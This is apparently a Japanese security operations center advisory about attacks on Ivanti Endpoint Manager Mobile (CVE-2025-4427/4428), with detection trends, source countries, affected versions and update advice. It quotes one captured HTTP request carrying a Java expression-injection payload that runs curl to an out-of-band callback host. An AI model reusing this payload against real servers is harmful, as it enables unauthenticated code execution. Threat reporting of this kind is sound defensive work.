本サイトは、快適にご利用いただくためにクッキー(Cookie)を使用しております。
Cookieの使用に同意いただける場合は「同意する」ボタンを押してください。
なお本サイトのCookie使用については、「個人情報保護方針」をご覧ください。
Ivanti Endpoint Manager Mobileの脆弱性(CVE-2025-4427, CVE-2025-4428)を狙った攻撃
今月は、Ivanti Endpoint Manager Mobileの脆弱性(CVE-2025-4427, CVE-2025-4428)を狙った攻撃を新たに観測しました。Ivanti Endpoint Manager Mobileは、モバイルデバイスを効率的に管理するための統合エンドポイント管理ソリューションです。本脆弱性は、5/13(火)に公開されたもので、攻撃者に悪用された場合、認証を回避されて任意のコードを実行されてしまう恐れがあります。
下図は、本脆弱性を狙った攻撃の検知数推移です。弊社SOCでは5/16(金)に初観測しております。当該製品を使用されている場合は、早急に最新のバージョンにアップデートすることをお勧めします。
 |
以下は、弊社SOCで検知した攻撃例です。Javaのコード実行を試みた通信となっています。
|
GET /api/v2/featureusage_history?adminDeviceSpaceId=131&format=%24%7b''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(''.getClass().forName('java.lang.Runtime')).exec('curl%20d0mruib294msma2l4mjg3zrfugdpicokf.oast.pro')%7d HTTP/1.1 |
下表は、本脆弱性を狙った攻撃元国です。オランダ、アメリカからの攻撃を多数観測しました。
| # | 2025年5月 | |
| 1 | オランダ | 46.1 % |
| 2 | アメリカ | 31.6 % |
| 3 | ベトナム | 9.2 % |
| 4 | ドイツ | 7.9 % |
| 5 | フランス | 2.6 % |
影響対象
- Ivanti Endpoint Manager Mobile 11.12.0.5 未満
- Ivanti Endpoint Manager Mobile 12.3.0.0 以上 12.3.0.2 未満
- Ivanti Endpoint Manager Mobile 12.4.0.0 以上 12.4.0.2 未満
- Ivanti Endpoint Manager Mobile 12.5.0.0
対策方法
最新のバージョンにアップデートしてください。
参考情報
- Ivanti - Security Advisory Ivanti Endpoint Manager Mobile (EPMM) May 2025 (CVE-2025-4427 and CVE-2025-4428)
https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM?language=en_US - JPCERT - Ivanti Endpoint Manager Mobile(EPMM)の脆弱性(CVE-2025-4427、CVE-2025-4428)に関する注意喚起
https://www.jpcert.or.jp/at/2025/at250011.html - CVE-2025-4427
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4427
https://jvndb.jvn.jp/ja/contents/2025/JVNDB-2025-005585.html - CVE-2025-4428
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4428
https://jvndb.jvn.jp/ja/contents/2025/JVNDB-2025-005420.html
マネージドサービス事業部
MBSD-SOC
MBSD-SOC
